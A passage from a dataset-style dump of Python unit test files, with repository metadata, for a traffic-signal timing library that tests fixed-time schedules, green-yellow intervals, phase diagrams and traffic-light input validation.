greenyellow_interval.end_greenyellow == self.end_greenyellow:\n return True\n else:\n return False\n\n def __str__(self) -> str:\n \"\"\"string representation of object\"\"\"\n return f\"[{self.start_greenyellow:.2f}, {self.end_greenyellow:.2f}]\"\n"
},
{
"alpha_fraction": 0.6599915623664856,
"alphanum_fraction": 0.6833895444869995,
"avg_line_length": 48.93684387207031,
"blob_id": "8b3e357c9c904fd3590ccb3e25422f6f00377d7f",
"content_id": "43c8005d6006a9e89d1e3b2d5a45390b0685d136",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4744,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 95,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_violation_of_completeness.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import List, Optional\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule, GreenYellowInterval\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.validate_safety_restrictions.validate_completeness import validate_completeness\n\n\nclass TestValidatingCompleteness(unittest.TestCase):\n \"\"\" Unittests of the function find_other_sg_relation_matches \"\"\"\n\n @staticmethod\n def get_default_signalgroup(name: str, min_greenyellow: float = 10.0, max_greenyellow: float = 80.0,\n min_red: float = 10.0, max_red: float = 80.0) -> SignalGroup:\n \"\"\" Get a default signalgroup object\"\"\"\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n return SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=min_greenyellow, max_greenyellow=max_greenyellow, min_red=min_red,\n max_red=max_red, min_nr=1, max_nr=3)\n\n @staticmethod\n def get_default_intersection(additional_signalgroups: Optional[List[SignalGroup]] = None\n ) -> Intersection:\n \"\"\"\n Get a default intersection object with 2 conflicting signal groups \"sg1\" and \"sg2\"\n :param additional_signalgroups: signal groups to add to the intersection (besides signal group 'sg1' and 'sg2')\n (besides the conflict between signal group 'sg1' and 'sg2')\n :return: the intersection object\n \"\"\"\n if additional_signalgroups is None:\n additional_signalgroups = []\n\n signalgroup1 = TestValidatingCompleteness.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestValidatingCompleteness.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2] + additional_signalgroups,\n conflicts=[conflict])\n\n return intersection\n\n def test_complete(self) -> None:\n # WHEN\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n period=100)\n intersection = TestValidatingCompleteness.get_default_intersection()\n\n # WHEN\n validate_completeness(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_signalgroup_missing(self) -> None:\n # WHEN\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n period=100)\n signalgroup3 = TestValidatingCompleteness.get_default_signalgroup(name=\"sg3\")\n intersection = TestValidatingCompleteness.get_default_intersection(additional_signalgroups=[signalgroup3])\n\n with self.assertRaises(SafetyViolation):\n # WHEN\n validate_completeness(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_no_greenyellow_intervals(self) -> None:\n # WHEN\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)],\n sg3=[]),\n period=100)\n signalgroup3 = TestValidatingCompleteness.get_default_signalgroup(name=\"sg3\")\n intersection = TestValidatingCompleteness.get_default_intersection(additional_signalgroups=[signalgroup3])\n\n with self.assertRaises(SafetyViolation):\n # WHEN\n validate_completeness(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n"
},
{
"alpha_fraction": 0.6059634685516357,
"alphanum_fraction": 0.6094902157783508,
"avg_line_length": 38.481014251708984,
"blob_id": "e6f228f5a31367f3b8e61e549f5812aaeb16b600",
"content_id": "cff70288f840863d2d2142005a26c7017cb8e008",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3119,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 79,
"path": "/swift_cloud_py/entities/intersection/test/test_traffic_light.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for TrafficLight() \"\"\"\n return dict(capacity=1800, lost_time=1, weight=1, max_saturation=1)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing TrafficLight object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n TrafficLight(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_type(self) -> None:\n \"\"\" Test providing the wrong type \"\"\"\n\n for key in TestInputValidation.get_default_inputs():\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 'string' # all arguments are numbers\n with self.assertRaises(ValueError):\n # WHEN initializing the traffic light\n TrafficLight(**input_dict)\n\n # THEN an error should be raised\n\n def test_negativity(self) -> None:\n \"\"\" Test providing negative values for capacity, lost_time, weight and max_saturation\"\"\"\n\n for key in TestInputValidation.get_default_inputs():\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = -0.1 # all arguments are non-negative numbers\n with self.assertRaises(ValueError):\n # WHEN initializing the traffic light\n TrafficLight(**input_dict)\n\n # THEN an error should be raised\n\n def test_zero(self) -> None:\n \"\"\" Test providing zero values for capacity and max_saturation \"\"\"\n\n for key in [\"capacity\", \"max_saturation\"]:\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 0.0 # argument should be positive\n with self.assertRaises(ValueError):\n # WHEN initializing the traffic light\n TrafficLight(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" Test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n traffic_light = TrafficLight(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n traffic_light_dict = traffic_light.to_json()\n traffic_light_from_json = TrafficLight.from_json(traffic_light_dict=traffic_light_dict)\n self.assertDictEqual(traffic_light_dict, traffic_light_from_json.to_json())\n"
},
{
"alpha_fraction": 0.6240085959434509,
"alphanum_fraction": 0.6306537985801697,
"avg_line_length": 36.92683029174805,
"blob_id": "8a82b80523b9bc62c4af18464b8247f3dc813d0c",
"content_id": "7a6dd2fa329bfd4c82d1ee6ab4f87bf7cbf73bac",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4665,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 123,
"path": "/swift_cloud_py/entities/control_output/test/test_phase_diagram.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.control_output.phase_diagram import GreenYellowPhase, Phase, PhaseDiagram\n\n\nclass TestGreenYellowPhaseInputValidation(unittest.TestCase):\n\n def test_correct_input(self):\n \"\"\" Test initialization is correct with correct input\"\"\"\n # WHEN\n gy_phase = GreenYellowPhase(signalgroup_id=\"sg\", interval_index=0)\n\n # THEN\n self.assertEqual(gy_phase.signalgroup_id, \"sg\")\n self.assertEqual(gy_phase.interval_index, 0)\n\n def test_id_no_string(self):\n \"\"\" Test id is converted to string \"\"\"\n # WHEN\n # noinspection PyTypeChecker\n greenyellow_phase = GreenYellowPhase(signalgroup_id=1, interval_index=0)\n\n # THEN signalgroup_id should be converted to string\n self.assertIsInstance(greenyellow_phase.signalgroup_id, str)\n\n def test_index_no_int(self):\n \"\"\" Test constructing object fails if the index has the wrong datatype\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n GreenYellowPhase(signalgroup_id=\"sg1\", interval_index=\"wrong\")\n\n # THEN an error should be raised\n\n\nclass TestPhaseInputValidation(unittest.TestCase):\n\n def test_correct_input(self):\n \"\"\" Test initialization is correct with correct input\"\"\"\n # WHEN\n phase = Phase(greenyellow_phases=[GreenYellowPhase(signalgroup_id=\"sg1\", interval_index=1),\n GreenYellowPhase(signalgroup_id=\"sg2\", interval_index=0)])\n\n # THEN\n self.assertEqual(phase.greenyellow_phases[0].signalgroup_id, \"sg1\")\n self.assertEqual(phase.greenyellow_phases[1].signalgroup_id, \"sg2\")\n self.assertEqual(phase.greenyellow_phases[0].interval_index, 1)\n self.assertEqual(phase.greenyellow_phases[1].interval_index, 0)\n\n def test_input_no_list(self):\n \"\"\" Test wrong input type (not a list)\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n Phase(greenyellow_phases=1)\n\n # THEN an error should be raised\n\n def test_input_no_correct_list(self):\n \"\"\" Test wrong input type (not a list of GreenYellowPhase-objects)\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n Phase(greenyellow_phases=[1, 2, 3])\n\n # THEN an error should be raised\n\n\nclass TestPhaseDiagramInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for GreenYellowInterval() \"\"\"\n return dict(phases=[Phase(greenyellow_phases=[GreenYellowPhase(signalgroup_id=\"sg1\", interval_index=1),\n GreenYellowPhase(signalgroup_id=\"sg2\", interval_index=0)]),\n Phase(greenyellow_phases=[GreenYellowPhase(signalgroup_id=\"sg1\", interval_index=1),\n GreenYellowPhase(signalgroup_id=\"sg2\", interval_index=0)]\n )])\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with correct input \"\"\"\n # GIVEN\n input_dict = TestPhaseDiagramInputValidation.get_default_inputs()\n\n # WHEN\n PhaseDiagram(**input_dict)\n\n # THEN no error should be raised\n\n def test_input_no_list(self):\n \"\"\" Test wrong input type (not a list)\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n PhaseDiagram(phases=1)\n\n # THEN an error should be raised\n\n def test_input_no_correct_list(self):\n \"\"\" Test wrong input type (not a list of GreenYellowPhase-objects)\"\"\"\n with self.assertRaises(ValueError):\n # WHEN\n # noinspection PyTypeChecker\n PhaseDiagram(phases=1)\n\n # THEN an error should be raised\n\n\nclass TestFTSJsonConversion(unittest.TestCase):\n\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestPhaseDiagramInputValidation.get_default_inputs()\n\n # WHEN\n phase_diagram = PhaseDiagram(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n phase_lists = phase_diagram.to_json()\n phase_diagram_from_json = PhaseDiagram.from_json(phase_lists=phase_lists)\n self.assertListEqual(phase_lists, phase_diagram_from_json.to_json())\n"
},
{
"alpha_fraction": 0.6036489605903625,
"alphanum_fraction": 0.6209271550178528,
"avg_line_length": 45.32276153564453,
"blob_id": "5a8b2eac193505c25d844010ab08f2c9726b5f41",
"content_id": "b5af21c2e85c3ae82377c25a3af704c863c2a234",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 24829,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 536,
"path": "/swift_cloud_py/entities/control_output/test/test_fixed_time_schedule.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import GreenYellowInterval, FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass TestIntervalInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for GreenYellowInterval() \"\"\"\n return dict(start_greenyellow=82, end_greenyellow=1)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with correct input \"\"\"\n # GIVEN\n input_dict = TestIntervalInputValidation.get_default_inputs()\n\n # WHEN\n GreenYellowInterval(**input_dict)\n\n # THEN no error should be raised\n\n def test_not_a_number(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with non-numeric arguments \"\"\"\n for key in TestIntervalInputValidation.get_default_inputs():\n # GIVEN\n input_dict = TestIntervalInputValidation.get_default_inputs()\n input_dict[key] = \"str\" # each argument should be a number\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n GreenYellowInterval(**input_dict)\n\n # THEN an error should be raised\n\n def test_negative(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with negative start_greenyellow or end_greenyellow\"\"\"\n for key in TestIntervalInputValidation.get_default_inputs():\n # GIVEN\n input_dict = TestIntervalInputValidation.get_default_inputs()\n input_dict[key] = -1 # should be positive\n\n with self.assertRaises(AssertionError):\n # WHEN initializing the queue lengths\n GreenYellowInterval(**input_dict)\n\n # THEN an error should be raised\n\n def test_comparing_success(self):\n \"\"\" Test comparing two of the same greenyellow intervals\"\"\"\n # GIVEN\n greenyellow1 = GreenYellowInterval(start_greenyellow=10, end_greenyellow=35)\n greenyellow2 = GreenYellowInterval(start_greenyellow=10, end_greenyellow=35)\n\n # WHEN\n same = greenyellow1 == greenyellow2\n\n # THEN\n self.assertTrue(same)\n\n def test_comparing_failure(self):\n \"\"\" Test comparing two different greenyellow intervals\"\"\"\n # GIVEN\n greenyellow1 = GreenYellowInterval(start_greenyellow=10, end_greenyellow=35)\n greenyellow2 = GreenYellowInterval(start_greenyellow=11, end_greenyellow=35)\n\n # WHEN\n same = greenyellow1 == greenyellow2\n\n # THEN\n self.assertEqual(same, False)\n\n\nclass TestIntervalJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestIntervalInputValidation.get_default_inputs()\n\n # WHEN\n greenyellow_interval = GreenYellowInterval(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n greenyellow_interval_list = greenyellow_interval.to_json()\n greenyellow_interval_from_json = GreenYellowInterval.from_json(\n greenyellow_interval_list=greenyellow_interval_list)\n self.assertListEqual(greenyellow_interval_list, greenyellow_interval_from_json.to_json())\n\n\nclass TestFTSInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for GreenYellowInterval() \"\"\"\n return dict(greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=82, end_greenyellow=1),\n GreenYellowInterval(start_greenyellow=10, end_greenyellow=30)],\n sg2=[GreenYellowInterval(start_greenyellow=3, end_greenyellow=20)]),\n period=100)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing GreenYellowInterval object with correct input \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n\n # WHEN\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_no_dict(self) -> None:\n \"\"\" Test providing no dictionary for greenyellow_intervals\"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict[\"greenyellow_intervals\"] = 1\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_string_values(self) -> None:\n \"\"\" Test providing no string for each id in greenyellow_intervals\"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict[\"greenyellow_intervals\"][1] = [1, 2] # add value (1) which is not a string\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_list_for_intervals(self) -> None:\n \"\"\" Test providing no list for the values in greenyellow_intervals\"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict[\"greenyellow_intervals\"][\"id3\"] = 1 # rates is not a list\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_rate_no_greenyellow_interval(self) -> None:\n \"\"\" Test providing no GreenYellowInterval for the interval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict[\"greenyellow_intervals\"][\"id3\"] = [GreenYellowInterval(start_greenyellow=1, end_greenyellow=10),\n \"3\"]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_times_exceeding_period_duration(self) -> None:\n \"\"\" Test providing no GreenYellowInterval for the interval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for time in [\"start_greenyellow\", \"end_greenyellow\"]:\n with self.subTest(f\"{time} exceeding period duration\"):\n greenyellow_interval_dict = dict(start_greenyellow=1, end_greenyellow=10)\n greenyellow_interval_dict[time] = input_dict[\"period\"] + 1\n input_dict[\"greenyellow_intervals\"][\"id3\"] = [GreenYellowInterval(**greenyellow_interval_dict)]\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_correct_order(self) -> None:\n \"\"\" Test providing GreenYellowInterval in the correct periodic order \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(3):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=0, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_correct_order2(self) -> None:\n \"\"\" Test providing GreenYellowInterval in the correct periodic order \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(3):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=70, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_wrong_order(self) -> None:\n \"\"\" Test providing GreenYellowInterval in the wrong periodic order \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(3):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=0, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60),\n GreenYellowInterval(start_greenyellow=30, end_greenyellow=40)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_wrong_order2(self) -> None:\n \"\"\" Test providing GreenYellowInterval in the wrong periodic order \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(3):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=70, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60),\n GreenYellowInterval(start_greenyellow=30, end_greenyellow=40)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_not_overlapping(self) -> None:\n \"\"\" Test providing non-overlapping GreenYellowInterval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(2):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=0, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=20, end_greenyellow=40)] # at the verge of overlap\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_not_overlapping2(self) -> None:\n \"\"\" Test providing non-overlapping GreenYellowInterval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(2):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=70, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=20, end_greenyellow=40)] # at the verge of overlap\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN no error should be raised\n\n def test_overlapping(self) -> None:\n \"\"\" Test providing overlapping GreenYellowInterval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(2):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=0, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=15, end_greenyellow=40)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_overlapping2(self) -> None:\n \"\"\" Test providing overlapping GreenYellowInterval \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n for first_interval in range(2):\n with self.subTest(f\"first interval={first_interval}\"):\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n [GreenYellowInterval(start_greenyellow=70, end_greenyellow=20),\n GreenYellowInterval(start_greenyellow=15, end_greenyellow=40)]\n input_dict[\"greenyellow_intervals\"][\"id3\"] = \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][first_interval:] + \\\n input_dict[\"greenyellow_intervals\"][\"id3\"][:first_interval]\n\n with self.assertRaises(ValueError):\n # WHEN initializing the fts\n FixedTimeSchedule(**input_dict)\n\n # THEN an error should be raised\n\n def test_comparing_success(self):\n \"\"\" Test comparing two equal fixed-time schedules \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict2 = TestFTSInputValidation.get_default_inputs() # ensure not same references\n fts1 = FixedTimeSchedule(**input_dict)\n fts2 = FixedTimeSchedule(**input_dict2)\n\n # WHEN\n same = fts1 == fts2\n\n self.assertTrue(same)\n\n def test_comparing_different_period(self):\n \"\"\" Test comparing two different fixed-time schedules (different period) \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict2 = TestFTSInputValidation.get_default_inputs() # ensure not same references\n input_dict2[\"period\"] = input_dict[\"period\"] * 2\n fts1 = FixedTimeSchedule(**input_dict)\n fts2 = FixedTimeSchedule(**input_dict2)\n\n # WHEN\n same = fts1 == fts2\n\n self.assertEqual(same, False)\n\n def test_comparing_different_ids(self):\n \"\"\" Test comparing two different fixed-time schedules (different ids) \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict2 = TestFTSInputValidation.get_default_inputs() # ensure not same references\n input_dict2[\"greenyellow_intervals\"][\"sg3\"] = input_dict2[\"greenyellow_intervals\"][\"sg2\"]\n del input_dict2[\"greenyellow_intervals\"][\"sg2\"]\n fts1 = FixedTimeSchedule(**input_dict)\n fts2 = FixedTimeSchedule(**input_dict2)\n\n # WHEN\n same = fts1 == fts2\n\n self.assertEqual(same, False)\n\n def test_comparing_different_greenyellow_intervals(self):\n \"\"\" Test comparing two different fixed-time schedules (different ids) \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n input_dict2 = TestFTSInputValidation.get_default_inputs() # ensure not same references\n input_dict2[\"greenyellow_intervals\"][\"sg2\"][0] = GreenYellowInterval(start_greenyellow=13, end_greenyellow=23)\n fts1 = FixedTimeSchedule(**input_dict)\n fts2 = FixedTimeSchedule(**input_dict2)\n\n # WHEN\n same = fts1 == fts2\n\n self.assertEqual(same, False)\n\n\nclass TestFTSMethods(unittest.TestCase):\n @staticmethod\n def get_default_fts_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for GreenYellowInterval() \"\"\"\n return dict(greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=82, end_greenyellow=1),\n GreenYellowInterval(start_greenyellow=10, end_greenyellow=30)],\n sg2=[GreenYellowInterval(start_greenyellow=3, end_greenyellow=20)]),\n period=100)\n\n def test_retrieving_greenyellow_intervals(self):\n \"\"\" test retrieving all greenyellow intervals of a signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n sg2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n # WHEN\n fts = FixedTimeSchedule(**input_dict)\n\n # THEN\n self.assertEqual(fts.get_greenyellow_intervals(signalgroup=sg1), input_dict[\"greenyellow_intervals\"][\"sg1\"])\n self.assertEqual(fts.get_greenyellow_intervals(signalgroup=sg2), input_dict[\"greenyellow_intervals\"][\"sg2\"])\n\n def test_retrieving_greenyellow_intervals_by_id(self):\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n sg2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n # WHEN\n fts = FixedTimeSchedule(**input_dict)\n\n # using id should give the same result\n self.assertEqual(fts.get_greenyellow_intervals(signalgroup=sg1),\n fts.get_greenyellow_intervals(signalgroup=sg1.id))\n self.assertEqual(fts.get_greenyellow_intervals(signalgroup=sg2),\n fts.get_greenyellow_intervals(signalgroup=sg2.id))\n\n def test_retrieving_for_unkown_signalgroup(self):\n \"\"\" test retrieving greenyellow intervals of an unkown signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n # unkown signal group\n sg3 = SignalGroup(id=\"sg3\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n fts = FixedTimeSchedule(**input_dict)\n\n with self.assertRaises(ValueError):\n # WHEN trying to access greenyellow intervals of an unkown signal group\n fts.get_greenyellow_intervals(sg3)\n\n # THEN an error should be 